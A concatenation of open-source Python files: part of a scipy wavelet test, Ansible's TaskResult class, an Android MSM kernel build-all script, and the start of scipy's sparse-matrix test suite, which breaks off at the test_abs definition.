w = wavelets.ricker(length, 1.0)
assert_(len(w) == length)
max_loc = np.argmax(w)
assert_(max_loc == (length // 2))
points = 100
w = wavelets.ricker(points, 2.0)
half_vec = np.arange(0, points // 2)
#Wavelet should be symmetric
assert_array_almost_equal(w[half_vec], w[-(half_vec + 1)])
#Check zeros
aas = [5, 10, 15, 20, 30]
points = 99
for a in aas:
w = wavelets.ricker(points, a)
vec = np.arange(0, points) - (points - 1.0) / 2
exp_zero1 = np.argmin(np.abs(vec - a))
exp_zero2 = np.argmin(np.abs(vec + a))
assert_array_almost_equal(w[exp_zero1], 0)
assert_array_almost_equal(w[exp_zero2], 0)
def test_cwt(self):
widths = [1.0]
delta_wavelet = lambda s, t: np.array([1])
len_data = 100
test_data = np.sin(np.pi * np.arange(0, len_data) / 10.0)
#Test delta function input gives same data as output
cwt_dat = wavelets.cwt(test_data, delta_wavelet, widths)
assert_(cwt_dat.shape == (len(widths), len_data))
assert_array_almost_equal(test_data, cwt_dat.flatten())
#Check proper shape on output
widths = [1, 3, 4, 5, 10]
cwt_dat = wavelets.cwt(test_data, wavelets.ricker, widths)
assert_(cwt_dat.shape == (len(widths), len_data))
widths = [len_data * 10]
#Note: this wavelet isn't defined quite right, but is fine for this test
flat_wavelet = lambda l, w: np.ones(w) / w
cwt_dat = wavelets.cwt(test_data, flat_wavelet, widths)
assert_array_almost_equal(cwt_dat, np.mean(test_data))
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause |
janek-warchol/ansible | lib/ansible/executor/task_result.py | 130 | 2534 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.parsing import DataLoader
class TaskResult:
'''
This class is responsible for interpretting the resulting data
from an executed task, and provides helper methods for determining
the result of a given task.
'''
def __init__(self, host, task, return_data):
self._host = host
self._task = task
if isinstance(return_data, dict):
self._result = return_data.copy()
else:
self._result = DataLoader().load(return_data)
def is_changed(self):
return self._check_key('changed')
def is_skipped(self):
if 'results' in self._result and self._task.loop:
flag = True
for res in self._result.get('results', []):
if isinstance(res, dict):
flag &= res.get('skipped', False)
return flag
else:
return self._result.get('skipped', False)
def is_failed(self):
if 'failed_when_result' in self._result or \
'results' in self._result and True in [True for x in self._result['results'] if 'failed_when_result' in x]:
return self._check_key('failed_when_result')
else:
return self._check_key('failed') or self._result.get('rc', 0) != 0
def is_unreachable(self):
return self._check_key('unreachable')
def _check_key(self, key):
if 'results' in self._result and self._task.loop:
flag = False
for res in self._result.get('results', []):
if isinstance(res, dict):
flag |= res.get(key, False)
return flag
else:
return self._result.get(key, False)
| gpl-3.0 |
MH2033/VIPER_KERNEL_KK_D802 | scripts/build-all.py | 1474 | 10189 | #! /usr/bin/env python
# Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Build the kernel for all targets using the Android build environment.
#
# TODO: Accept arguments to indicate what to build.
import glob
from optparse import OptionParser
import subprocess
import os
import os.path
import re
import shutil
import sys
version = 'build-all.py, version 0.01'
build_dir = '../all-kernels'
make_command = ["vmlinux", "modules", "dtbs"]
make_env = os.environ
make_env.update({
'ARCH': 'arm',
'KCONFIG_NOTIMESTAMP': 'true' })
make_env.setdefault('CROSS_COMPILE', 'arm-none-linux-gnueabi-')
all_options = {}
def error(msg):
sys.stderr.write("error: %s\n" % msg)
def fail(msg):
"""Fail with a user-printed message"""
error(msg)
sys.exit(1)
def check_kernel():
"""Ensure that PWD is a kernel directory"""
if (not os.path.isfile('MAINTAINERS') or
not os.path.isfile('arch/arm/mach-msm/Kconfig')):
fail("This doesn't seem to be an MSM kernel dir")
def check_build():
"""Ensure that the build directory is present."""
if not os.path.isdir(build_dir):
try:
os.makedirs(build_dir)
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
def update_config(file, str):
print 'Updating %s with \'%s\'\n' % (file, str)
defconfig = open(file, 'a')
defconfig.write(str + '\n')
defconfig.close()
def scan_configs():
"""Get the full list of defconfigs appropriate for this tree."""
names = {}
arch_pats = (
r'[fm]sm[0-9]*_defconfig',
r'apq*_defconfig',
r'qsd*_defconfig',
r'msmkrypton*_defconfig',
)
for p in arch_pats:
for n in glob.glob('arch/arm/configs/' + p):
names[os.path.basename(n)[:-10]] = n
return names
class Builder:
def __init__(self, logname):
self.logname = logname
self.fd = open(logname, 'w')
def run(self, args):
devnull = open('/dev/null', 'r')
proc = subprocess.Popen(args, stdin=devnull,
env=make_env,
bufsize=0,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
count = 0
# for line in proc.stdout:
rawfd = proc.stdout.fileno()
while True:
line = os.read(rawfd, 1024)
if not line:
break
self.fd.write(line)
self.fd.flush()
if all_options.verbose:
sys.stdout.write(line)
sys.stdout.flush()
else:
for i in range(line.count('\n')):
count += 1
if count == 64:
count = 0
print
sys.stdout.write('.')
sys.stdout.flush()
print
result = proc.wait()
self.fd.close()
return result
failed_targets = []
def build(target):
dest_dir = os.path.join(build_dir, target)
log_name = '%s/log-%s.log' % (build_dir, target)
print 'Building %s in %s log %s' % (target, dest_dir, log_name)
if not os.path.isdir(dest_dir):
os.mkdir(dest_dir)
defconfig = 'arch/arm/configs/%s_defconfig' % target
dotconfig = '%s/.config' % dest_dir
savedefconfig = '%s/defconfig' % dest_dir
shutil.copyfile(defconfig, dotconfig)
staging_dir = 'install_staging'
modi_dir = '%s' % staging_dir
hdri_dir = '%s/usr' % staging_dir
shutil.rmtree(os.path.join(dest_dir, staging_dir), ignore_errors=True)
devnull = open('/dev/null', 'r')
subprocess.check_call(['make', 'O=%s' % dest_dir,
'%s_defconfig' % target], env=make_env, stdin=devnull)
devnull.close()
if not all_options.updateconfigs:
# Build targets can be dependent upon the completion of previous
# build targets, so build them one at a time.
cmd_line = ['make',
'INSTALL_HDR_PATH=%s' % hdri_dir,
'INSTALL_MOD_PATH=%s' % modi_dir,
'O=%s' % dest_dir]
build_targets = []
for c in make_command:
if re.match(r'^-{1,2}\w', c):
cmd_line.append(c)
else:
build_targets.append(c)
for t in build_targets:
build = Builder(log_name)
result = build.run(cmd_line + [t])
if result != 0:
if all_options.keep_going:
failed_targets.append(target)
fail_or_error = error
else:
fail_or_error = fail
fail_or_error("Failed to build %s, see %s" %
(target, build.logname))
# Copy the defconfig back.
if all_options.configs or all_options.updateconfigs:
devnull = open('/dev/null', 'r')
subprocess.check_call(['make', 'O=%s' % dest_dir,
'savedefconfig'], env=make_env, stdin=devnull)
devnull.close()
shutil.copyfile(savedefconfig, defconfig)
def build_many(allconf, targets):
print "Building %d target(s)" % len(targets)
for target in targets:
if all_options.updateconfigs:
update_config(allconf[target], all_options.updateconfigs)
build(target)
if failed_targets:
fail('\n '.join(["Failed targets:"] +
[target for target in failed_targets]))
def main():
global make_command
check_kernel()
check_build()
configs = scan_configs()
usage = ("""
%prog [options] all -- Build all targets
%prog [options] target target ... -- List specific targets
%prog [options] perf -- Build all perf targets
%prog [options] noperf -- Build all non-perf targets""")
parser = OptionParser(usage=usage, version=version)
parser.add_option('--configs', action='store_true',
dest='configs',
help="Copy configs back into tree")
parser.add_option('--list', action='store_true',
dest='list',
help='List available targets')
parser.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='Output to stdout in addition to log file')
parser.add_option('--oldconfig', action='store_true',
dest='oldconfig',
help='Only process "make oldconfig"')
parser.add_option('--updateconfigs',
dest='updateconfigs',
help="Update defconfigs with provided option setting, "
"e.g. --updateconfigs=\'CONFIG_USE_THING=y\'")
parser.add_option('-j', '--jobs', type='int', dest="jobs",
help="Number of simultaneous jobs")
parser.add_option('-l', '--load-average', type='int',
dest='load_average',
help="Don't start multiple jobs unless load is below LOAD_AVERAGE")
parser.add_option('-k', '--keep-going', action='store_true',
dest='keep_going', default=False,
help="Keep building other targets if a target fails")
parser.add_option('-m', '--make-target', action='append',
help='Build the indicated make target (default: %s)' %
' '.join(make_command))
(options, args) = parser.parse_args()
global all_options
all_options = options
if options.list:
print "Available targets:"
for target in configs.keys():
print " %s" % target
sys.exit(0)
if options.oldconfig:
make_command = ["oldconfig"]
elif options.make_target:
make_command = options.make_target
if options.jobs:
make_command.append("-j%d" % options.jobs)
if options.load_average:
make_command.append("-l%d" % options.load_average)
if args == ['all']:
build_many(configs, configs.keys())
elif args == ['perf']:
targets = []
for t in configs.keys():
if "perf" in t:
targets.append(t)
build_many(configs, targets)
elif args == ['noperf']:
targets = []
for t in configs.keys():
if "perf" not in t:
targets.append(t)
build_many(configs, targets)
elif len(args) > 0:
targets = []
for t in args:
if t not in configs.keys():
parser.error("Target '%s' not one of %s" % (t, configs.keys()))
targets.append(t)
build_many(configs, targets)
else:
parser.error("Must specify a target to build, or 'all'")
if __name__ == "__main__":
main()
| gpl-2.0 |
ales-erjavec/scipy | scipy/sparse/tests/test_base.py | 22 | 151714 | #
# Authors: Travis Oliphant, Ed Schofield, Robert Cimrman, Nathan Bell, and others
""" Test functions for sparse matrices. Each class in the "Matrix class
based tests" section become subclasses of the classes in the "Generic
tests" section. This is done by the functions in the "Tailored base
class for generic tests" section.
"""
from __future__ import division, print_function, absolute_import
__usage__ = """
Build sparse:
python setup.py build
Run tests if scipy is installed:
python -c 'import scipy;scipy.sparse.test()'
Run tests if sparse is not installed:
python tests/test_base.py
"""
import warnings
import operator
import contextlib
import numpy as np
from scipy._lib.six import xrange, zip as izip
from numpy import (arange, zeros, array, dot, matrix, asmatrix, asarray,
vstack, ndarray, transpose, diag, kron, inf, conjugate,
int8, ComplexWarning, power)
import random
from numpy.testing import (assert_raises, assert_equal, assert_array_equal,
assert_array_almost_equal, assert_almost_equal, assert_,
dec, run_module_suite, assert_allclose)
import scipy.linalg
import scipy.sparse as sparse
from scipy.sparse import (csc_matrix, csr_matrix, dok_matrix,
coo_matrix, lil_matrix, dia_matrix, bsr_matrix,
eye, isspmatrix, SparseEfficiencyWarning, issparse)
from scipy.sparse.sputils import supported_dtypes, isscalarlike, get_index_dtype
from scipy.sparse.linalg import splu, expm, inv
from scipy._lib._version import NumpyVersion
from scipy._lib.decorator import decorator
import nose
# Check for __numpy_ufunc__
class _UFuncCheck(object):
def __array__(self):
return np.array([1])
def __numpy_ufunc__(self, *a, **kwargs):
global HAS_NUMPY_UFUNC
HAS_NUMPY_UFUNC = True
HAS_NUMPY_UFUNC = False
np.add(_UFuncCheck(), np.array([1]))
warnings.simplefilter('ignore', SparseEfficiencyWarning)
warnings.simplefilter('ignore', ComplexWarning)
def with_64bit_maxval_limit(maxval_limit=None, random=False, fixed_dtype=None,
downcast_maxval=None, assert_32bit=False):
"""
Monkeypatch the maxval threshold at which scipy.sparse switches to
64-bit index arrays, or make it (pseudo-)random.
"""
if maxval_limit is None:
maxval_limit = 10
if assert_32bit:
def new_get_index_dtype(arrays=(), maxval=None, check_contents=False):
tp = get_index_dtype(arrays, maxval, check_contents)
assert_equal(np.iinfo(tp).max, np.iinfo(np.int32).max)
assert_(tp == np.int32 or tp == np.intc)
return tp
elif fixed_dtype is not None:
def new_get_index_dtype(arrays=(), maxval=None, check_contents=False):
return fixed_dtype
elif random:
counter = np.random.RandomState(seed=1234)
def new_get_index_dtype(arrays=(), maxval=None, check_contents=False):
return (np.int32, np.int64)[counter.randint(2)]
else:
def new_get_index_dtype(arrays=(), maxval=None, check_contents=False):
dtype = np.int32
if maxval is not None:
if maxval > maxval_limit:
dtype = np.int64
for arr in arrays:
arr = np.asarray(arr)
if arr.dtype > np.int32:
if check_contents:
if arr.size == 0:
# a bigger type not needed
continue
elif np.issubdtype(arr.dtype, np.integer):
maxval = arr.max()
minval = arr.min()
if minval >= -maxval_limit and maxval <= maxval_limit:
# a bigger type not needed
continue
dtype = np.int64
return dtype
if downcast_maxval is not None:
def new_downcast_intp_index(arr):
if arr.max() > downcast_maxval:
raise AssertionError("downcast limited")
return arr.astype(np.intp)
@decorator
def deco(func, *a, **kw):
backup = []
modules = [scipy.sparse.bsr, scipy.sparse.coo, scipy.sparse.csc,
scipy.sparse.csr, scipy.sparse.dia, scipy.sparse.dok,
scipy.sparse.lil, scipy.sparse.sputils,
scipy.sparse.compressed, scipy.sparse.construct]
try:
for mod in modules:
backup.append((mod, 'get_index_dtype',
getattr(mod, 'get_index_dtype', None)))
setattr(mod, 'get_index_dtype', new_get_index_dtype)
if downcast_maxval is not None:
backup.append((mod, 'downcast_intp_index',
getattr(mod, 'downcast_intp_index', None)))
setattr(mod, 'downcast_intp_index', new_downcast_intp_index)
return func(*a, **kw)
finally:
for mod, name, oldfunc in backup:
if oldfunc is not None:
setattr(mod, name, oldfunc)
return deco
def todense(a):
if isinstance(a, np.ndarray) or isscalarlike(a):
return a
return a.todense()
class BinopTester(object):
# Custom type to test binary operations on sparse matrices.
def __add__(self, mat):
return "matrix on the right"
def __mul__(self, mat):
return "matrix on the right"
def __sub__(self, mat):
return "matrix on the right"
def __radd__(self, mat):
return "matrix on the left"
def __rmul__(self, mat):
return "matrix on the left"
def __rsub__(self, mat):
return "matrix on the left"
#------------------------------------------------------------------------------
# Generic tests
#------------------------------------------------------------------------------
# TODO check that spmatrix( ... , copy=X ) is respected
# TODO test prune
# TODO test has_sorted_indices
class _TestCommon:
"""test common functionality shared by all sparse formats"""
checked_dtypes = supported_dtypes
def __init__(self):
# Canonical data.
self.dat = matrix([[1,0,0,2],[3,0,1,0],[0,2,0,0]],'d')
self.datsp = self.spmatrix(self.dat)
# Some sparse and dense matrices with data for every supported
# dtype.
self.dat_dtypes = {}
self.datsp_dtypes = {}
for dtype in self.checked_dtypes:
self.dat_dtypes[dtype] = self.dat.astype(dtype)
self.datsp_dtypes[dtype] = self.spmatrix(self.dat.astype(dtype))
# Check that the original data is equivalent to the
# corresponding dat_dtypes & datsp_dtypes.
assert_equal(self.dat, self.dat_dtypes[np.float64])
assert_equal(self.datsp.todense(),
self.datsp_dtypes[np.float64].todense())
def test_bool(self):
def check(dtype):
datsp = self.datsp_dtypes[dtype]
assert_raises(ValueError, bool, datsp)
assert_(self.spmatrix([1]))
assert_(not self.spmatrix([0]))
for dtype in self.checked_dtypes:
fails = isinstance(self, TestDOK)
msg = "Cannot create a rank <= 2 DOK matrix."
yield dec.skipif(fails, msg)(check), dtype
def test_bool_rollover(self):
# bool's underlying dtype is 1 byte, check that it does not
# rollover True -> False at 256.
dat = np.matrix([[True, False]])
datsp = self.spmatrix(dat)
for _ in range(10):
datsp = datsp + datsp
dat = dat + dat
assert_array_equal(dat, datsp.todense())
def test_eq(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datbsr = bsr_matrix(dat)
datcsr = csr_matrix(dat)
datcsc = csc_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat == dat2, (datsp == datsp2).todense())
# mix sparse types
assert_array_equal(dat == dat2, (datbsr == datsp2).todense())
assert_array_equal(dat == dat2, (datcsr == datsp2).todense())
assert_array_equal(dat == dat2, (datcsc == datsp2).todense())
assert_array_equal(dat == dat2, (datlil == datsp2).todense())
# sparse/dense
assert_array_equal(dat == datsp2, datsp2 == dat)
# sparse/scalar
assert_array_equal(dat == 0, (datsp == 0).todense())
assert_array_equal(dat == 1, (datsp == 1).todense())
assert_array_equal(dat == np.nan, (datsp == np.nan).todense())
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_ne(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat != dat2, (datsp != datsp2).todense())
# mix sparse types
assert_array_equal(dat != dat2, (datbsr != datsp2).todense())
assert_array_equal(dat != dat2, (datcsc != datsp2).todense())
assert_array_equal(dat != dat2, (datcsr != datsp2).todense())
assert_array_equal(dat != dat2, (datlil != datsp2).todense())
# sparse/dense
assert_array_equal(dat != datsp2, datsp2 != dat)
# sparse/scalar
assert_array_equal(dat != 0, (datsp != 0).todense())
assert_array_equal(dat != 1, (datsp != 1).todense())
assert_array_equal(0 != dat, (0 != datsp).todense())
assert_array_equal(1 != dat, (1 != datsp).todense())
assert_array_equal(dat != np.nan, (datsp != np.nan).todense())
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_lt(self):
def check(dtype):
# data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datcomplex = dat.astype(complex)
datcomplex[:,0] = 1 + 1j
datspcomplex = self.spmatrix(datcomplex)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat < dat2, (datsp < datsp2).todense())
assert_array_equal(datcomplex < dat2, (datspcomplex < datsp2).todense())
# mix sparse types
assert_array_equal(dat < dat2, (datbsr < datsp2).todense())
assert_array_equal(dat < dat2, (datcsc < datsp2).todense())
assert_array_equal(dat < dat2, (datcsr < datsp2).todense())
assert_array_equal(dat < dat2, (datlil < datsp2).todense())
assert_array_equal(dat2 < dat, (datsp2 < datbsr).todense())
assert_array_equal(dat2 < dat, (datsp2 < datcsc).todense())
assert_array_equal(dat2 < dat, (datsp2 < datcsr).todense())
assert_array_equal(dat2 < dat, (datsp2 < datlil).todense())
# sparse/dense
assert_array_equal(dat < dat2, datsp < dat2)
assert_array_equal(datcomplex < dat2, datspcomplex < dat2)
# sparse/scalar
assert_array_equal((datsp < 2).todense(), dat < 2)
assert_array_equal((datsp < 1).todense(), dat < 1)
assert_array_equal((datsp < 0).todense(), dat < 0)
assert_array_equal((datsp < -1).todense(), dat < -1)
assert_array_equal((datsp < -2).todense(), dat < -2)
with np.errstate(invalid='ignore'):
assert_array_equal((datsp < np.nan).todense(), dat < np.nan)
assert_array_equal((2 < datsp).todense(), 2 < dat)
assert_array_equal((1 < datsp).todense(), 1 < dat)
assert_array_equal((0 < datsp).todense(), 0 < dat)
assert_array_equal((-1 < datsp).todense(), -1 < dat)
assert_array_equal((-2 < datsp).todense(), -2 < dat)
if NumpyVersion(np.__version__) >= '1.8.0':
# data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
# dense rhs
assert_array_equal(dat < datsp2, datsp < dat2)
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
with np.errstate(invalid='ignore'):
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_gt(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datcomplex = dat.astype(complex)
datcomplex[:,0] = 1 + 1j
datspcomplex = self.spmatrix(datcomplex)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat > dat2, (datsp > datsp2).todense())
assert_array_equal(datcomplex > dat2, (datspcomplex > datsp2).todense())
# mix sparse types
assert_array_equal(dat > dat2, (datbsr > datsp2).todense())
assert_array_equal(dat > dat2, (datcsc > datsp2).todense())
assert_array_equal(dat > dat2, (datcsr > datsp2).todense())
assert_array_equal(dat > dat2, (datlil > datsp2).todense())
assert_array_equal(dat2 > dat, (datsp2 > datbsr).todense())
assert_array_equal(dat2 > dat, (datsp2 > datcsc).todense())
assert_array_equal(dat2 > dat, (datsp2 > datcsr).todense())
assert_array_equal(dat2 > dat, (datsp2 > datlil).todense())
# sparse/dense
assert_array_equal(dat > dat2, datsp > dat2)
assert_array_equal(datcomplex > dat2, datspcomplex > dat2)
# sparse/scalar
assert_array_equal((datsp > 2).todense(), dat > 2)
assert_array_equal((datsp > 1).todense(), dat > 1)
assert_array_equal((datsp > 0).todense(), dat > 0)
assert_array_equal((datsp > -1).todense(), dat > -1)
assert_array_equal((datsp > -2).todense(), dat > -2)
with np.errstate(invalid='ignore'):
assert_array_equal((datsp > np.nan).todense(), dat > np.nan)
assert_array_equal((2 > datsp).todense(), 2 > dat)
assert_array_equal((1 > datsp).todense(), 1 > dat)
assert_array_equal((0 > datsp).todense(), 0 > dat)
assert_array_equal((-1 > datsp).todense(), -1 > dat)
assert_array_equal((-2 > datsp).todense(), -2 > dat)
if NumpyVersion(np.__version__) >= '1.8.0':
# data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
# dense rhs
assert_array_equal(dat > datsp2, datsp > dat2)
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_le(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datcomplex = dat.astype(complex)
datcomplex[:,0] = 1 + 1j
datspcomplex = self.spmatrix(datcomplex)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat <= dat2, (datsp <= datsp2).todense())
assert_array_equal(datcomplex <= dat2, (datspcomplex <= datsp2).todense())
# mix sparse types
assert_array_equal((datbsr <= datsp2).todense(), dat <= dat2)
assert_array_equal((datcsc <= datsp2).todense(), dat <= dat2)
assert_array_equal((datcsr <= datsp2).todense(), dat <= dat2)
assert_array_equal((datlil <= datsp2).todense(), dat <= dat2)
assert_array_equal((datsp2 <= datbsr).todense(), dat2 <= dat)
assert_array_equal((datsp2 <= datcsc).todense(), dat2 <= dat)
assert_array_equal((datsp2 <= datcsr).todense(), dat2 <= dat)
assert_array_equal((datsp2 <= datlil).todense(), dat2 <= dat)
# sparse/dense
assert_array_equal(datsp <= dat2, dat <= dat2)
assert_array_equal(datspcomplex <= dat2, datcomplex <= dat2)
# sparse/scalar
assert_array_equal((datsp <= 2).todense(), dat <= 2)
assert_array_equal((datsp <= 1).todense(), dat <= 1)
assert_array_equal((datsp <= -1).todense(), dat <= -1)
assert_array_equal((datsp <= -2).todense(), dat <= -2)
assert_array_equal((2 <= datsp).todense(), 2 <= dat)
assert_array_equal((1 <= datsp).todense(), 1 <= dat)
assert_array_equal((-1 <= datsp).todense(), -1 <= dat)
assert_array_equal((-2 <= datsp).todense(), -2 <= dat)
if NumpyVersion(np.__version__) >= '1.8.0':
# data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
# dense rhs
assert_array_equal(dat <= datsp2, datsp <= dat2)
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_ge(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
datcomplex = dat.astype(complex)
datcomplex[:,0] = 1 + 1j
datspcomplex = self.spmatrix(datcomplex)
datbsr = bsr_matrix(dat)
datcsc = csc_matrix(dat)
datcsr = csr_matrix(dat)
datlil = lil_matrix(dat)
# sparse/sparse
assert_array_equal(dat >= dat2, (datsp >= datsp2).todense())
assert_array_equal(datcomplex >= dat2, (datspcomplex >= datsp2).todense())
# mix sparse types
# mix sparse types
assert_array_equal((datbsr >= datsp2).todense(), dat >= dat2)
assert_array_equal((datcsc >= datsp2).todense(), dat >= dat2)
assert_array_equal((datcsr >= datsp2).todense(), dat >= dat2)
assert_array_equal((datlil >= datsp2).todense(), dat >= dat2)
assert_array_equal((datsp2 >= datbsr).todense(), dat2 >= dat)
assert_array_equal((datsp2 >= datcsc).todense(), dat2 >= dat)
assert_array_equal((datsp2 >= datcsr).todense(), dat2 >= dat)
assert_array_equal((datsp2 >= datlil).todense(), dat2 >= dat)
# sparse/dense
assert_array_equal(datsp >= dat2, dat >= dat2)
assert_array_equal(datspcomplex >= dat2, datcomplex >= dat2)
# sparse/scalar
assert_array_equal((datsp >= 2).todense(), dat >= 2)
assert_array_equal((datsp >= 1).todense(), dat >= 1)
assert_array_equal((datsp >= -1).todense(), dat >= -1)
assert_array_equal((datsp >= -2).todense(), dat >= -2)
assert_array_equal((2 >= datsp).todense(), 2 >= dat)
assert_array_equal((1 >= datsp).todense(), 1 >= dat)
assert_array_equal((-1 >= datsp).todense(), -1 >= dat)
assert_array_equal((-2 >= datsp).todense(), -2 >= dat)
if NumpyVersion(np.__version__) >= '1.8.0':
# dense data
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
dat2 = dat.copy()
dat2[:,0] = 0
datsp2 = self.spmatrix(dat2)
# dense rhs
assert_array_equal(dat >= datsp2, datsp >= dat2)
msg = "Bool comparisons only implemented for BSR, CSC, and CSR."
fails = not isinstance(self, (TestBSR, TestCSC, TestCSR))
for dtype in self.checked_dtypes:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=np.ComplexWarning)
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
yield dec.skipif(fails, msg)(check), dtype
def test_empty(self):
# create empty matrices
assert_equal(self.spmatrix((3,3)).todense(), np.zeros((3,3)))
assert_equal(self.spmatrix((3,3)).nnz, 0)
def test_invalid_shapes(self):
assert_raises(ValueError, self.spmatrix, (-1,3))
assert_raises(ValueError, self.spmatrix, (3,-1))
assert_raises(ValueError, self.spmatrix, (-1,-1))
def test_repr(self):
repr(self.datsp)
def test_str(self):
str(self.datsp)
def test_empty_arithmetic(self):
# Test manipulating empty matrices. Fails in SciPy SVN <= r1768
shape = (5, 5)
for mytype in [np.dtype('int32'), np.dtype('float32'),
np.dtype('float64'), np.dtype('complex64'),
np.dtype('complex128')]:
a = self.spmatrix(shape, dtype=mytype)
b = a + a
c = 2 * a
d = a * a.tocsc()
e = a * a.tocsr()
f = a * a.tocoo()
for m in [a,b,c,d,e,f]:
assert_equal(m.A, a.A*a.A)
# These fail in all revisions <= r1768:
assert_equal(m.dtype,mytype)
assert_equal(m.A.dtype,mytype)
def test_abs(self):
